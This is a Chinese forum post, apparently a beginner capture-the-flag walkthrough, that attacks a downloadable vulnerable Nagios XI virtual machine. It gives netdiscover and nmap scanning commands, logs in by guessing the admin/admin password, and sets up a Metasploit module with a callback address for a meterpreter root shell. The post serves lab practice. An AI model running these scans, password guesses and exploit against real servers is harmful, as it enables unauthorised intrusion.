用户
搜索
  • TA的每日心情

    5 天前
  • 签到天数: 57 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-见习白帽

    Rank: 3Rank: 3

    37

    主题

    48

    帖子

    1397

    魔法币
    收听
    0
    粉丝
    6
    注册时间
    2020-7-23
    发表于 2020-9-24 22:40:12 23026
    该靶机适合入门/教学做,目前我选择的靶机主要以基础为主。如果大佬们觉得简单可以选中等难度挑战一波
    0x00:靶机下载
    难度:非常简单建议用VM存放,目标是获得root权限去读取flag
    0.png
    下载完以后是个.ova的文件
    1.png
    双击点开,找个地方存放即可,调回NAT模式就可以运行了
    2.png
    0x01:探测靶机
    先用netdiscover确认靶机ip先,排除.1,.2和.254可以确认靶机IP为192.168.19.133
    命令:netdiscover -r 192.168.19.0/16
    3.png
    然后开始用Nmap探测波端口,主要开了22,25,80,389和443端口
    命令:nmap -A -sS -sV -v -p- 192.168.19.133
    4.png
    访问波IP可以正常回显,开搞
    5.png
    0x02:挖掘漏洞
    由于访问IP的时候有个大大的NagiosXI,觉得是一个CMS用whatweb求证了一下确实是个CMS,不过版本未知
    6.png
    启动MSF用search找到点payload
    7.png
    不过先返回去先,点完access以后会有个登录界面,这里尝试了抓包SQL注入有点小慢,查了下它的默认用户名为nagiosadmin配相同密码失败,然而配admin却成功了。。。。。。。。。也可以头铁点用burp的intruder跑密码也行
    8.png
    成功登录
    9.png
    然后回到MSF用第一个即序列0payload
    命令:set RHOSTS 192.168.19.133
           SetPASSWORD admin
           SetLHOST 192.168.19.134(kali的IP)
           zuihou exploit
    10.png

    出现了meterpreter就是代表运行成功了
    11.png
    输入shell然后再打一个python的交互shell直接发现是root权限不用提权直接读flag
    12.png

    这篇还挺基础的。
    使用道具 举报 回复
    感谢分享
    剑未佩妥出门已是江湖
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册